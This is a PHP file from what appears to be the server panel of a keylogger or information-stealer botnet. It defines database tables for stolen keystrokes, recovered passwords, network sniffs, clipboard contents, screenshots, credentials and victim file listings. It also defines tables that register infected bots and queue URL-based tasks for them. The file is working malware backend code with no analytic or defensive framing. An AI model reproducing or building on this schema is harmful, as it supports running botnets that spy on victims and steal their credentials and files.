<?php
//DATABASE TABLE STRING///////////////////////////////////////////////////////////////////
function dbTable_str()
{
    $table = "(id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, 
            content TEXT(16384) CHARACTER SET utf8 NOT NULL, user VARCHAR(80) NOT NULL, 
            date DATETIME NOT NULL, ip VARCHAR(16) NOT NULL, countryNumber int(3) NOT NULL)";
    
return array(
///////////////////////////////
'logs' => 'CREATE TABLE logs (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, 
        host VARCHAR(256) NOT NULL, agent VARCHAR(512) NOT NULL, content VARCHAR(8192) NOT NULL, 
        ost int NOT NULL, browser INT NOT NULL, user VARCHAR(80) NOT NULL,
        date DATETIME NOT NULL, ip VARCHAR(16) NOT NULL, countryNumber int(3) NOT NULL)',
    
'keystrokes' => 'CREATE TABLE keystrokes '.$table,
    
'recoveries' => 'CREATE TABLE recoveries '.$table,
    
'sniffs' => 'CREATE TABLE sniffs '.$table,
    
'clipboard' => 'CREATE TABLE clipboard '.$table,
    
'junk' => 'CREATE TABLE junk '.$table,
    
'screenshots' => 'CREATE TABLE screenshots '.$table,
    
'blacklisted' => 'CREATE TABLE blacklisted (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, 
                host VARCHAR(256) NOT NULL, comment VARCHAR(256) NOT NULL)',
    
'geoip' => 'CREATE TABLE IF NOT EXISTS geoip (iplong_start int(16) unsigned NOT NULL,
                iplong_end int(16) unsigned NOT NULL, cnum int(3) unsigned NOT NULL)',
    
'bots' => 'CREATE TABLE bots (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, 
            botID VARCHAR(12) NOT NULL, user VARCHAR(80) NOT NULL, ost int NOT NULL, ip VARCHAR(16) NOT NULL,
            countryNumber int(3) NOT NULL, os VARCHAR(80) NOT NULL, insdate DATETIME NOT NULL, 
            actdate DATETIME NOT NULL, task int NOT NULL, bv VARCHAR(6) NOT NULL, status int(1) unsigned NOT NULL)',
    
'tasks' => 'CREATE TABLE tasks (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, 
            task int NOT NULL, url VARCHAR(256) NOT NULL, botsid VARCHAR(16384) NOT NULL, 
            botnum int NOT NULL, executed int NOT NULL, failed int NOT NULL,
            status VARCHAR(16) NOT NULL)',
    
'users' => 'CREATE TABLE users (user VARCHAR(256) NOT NULL,
            password VARCHAR(60) NOT NULL, privilege int NOT NULL,logtime DATETIME NOT NULL)',
    
'cred' => 'CREATE TABLE cred (account VARCHAR(256) NOT NULL,password VARCHAR(60) NOT NULL,logtime DATETIME NOT NULL)',

'vault' => 'CREATE TABLE vault (account VARCHAR(256) NOT NULL,language VARCHAR(60) NOT NULL,reserve1 VARCHAR(60) NOT NULL,
            reserve2 VARCHAR(60) NOT NULL,reserve3 VARCHAR(60) NOT NULL,reserve4 VARCHAR(60) NOT NULL)',
    
'fbc' => 'CREATE TABLE fbc (account VARCHAR(80) NOT NULL,cur_dir VARCHAR(256) NOT NULL,
            num_of_fbc int(1) unsigned NOT NULL,reserve1 VARCHAR(60) NOT NULL,
            reserve2 VARCHAR(60) NOT NULL,reserve3 VARCHAR(60) NOT NULL,reserve4 VARCHAR(60) NOT NULL)',
    
'fbc_users' => 'CREATE TABLE fbc_users (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,
            botID VARCHAR(12) NOT NULL, user VARCHAR(80) NOT NULL, ost int NOT NULL, ip VARCHAR(16) NOT NULL,
            countryNumber int(3) NOT NULL, osv VARCHAR(80) NOT NULL, actdate DATETIME NOT NULL,
            window VARCHAR(80) NOT NULL, bv VARCHAR(6) NOT NULL,bucket VARCHAR(16384) NOT NULL,
            bucket_type int(1) unsigned NOT NULL,request VARCHAR(512) NOT NULL,request_type int(1) unsigned NOT NULL,
            status int(1) unsigned NOT NULL)',
    
'fbc_files' => 'CREATE TABLE fbc_files (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,
            file_dir VARCHAR(256) NOT NULL,file_name VARCHAR(60) NOT NULL,
            file_size int unsigned NOT NULL,file_type int(1) unsigned NOT NULL,file_ext VARCHAR(8) NOT NULL,
            file_created DATETIME NOT NULL,file_modified DATETIME NOT NULL)'
//////////////////////////////////////////
);
}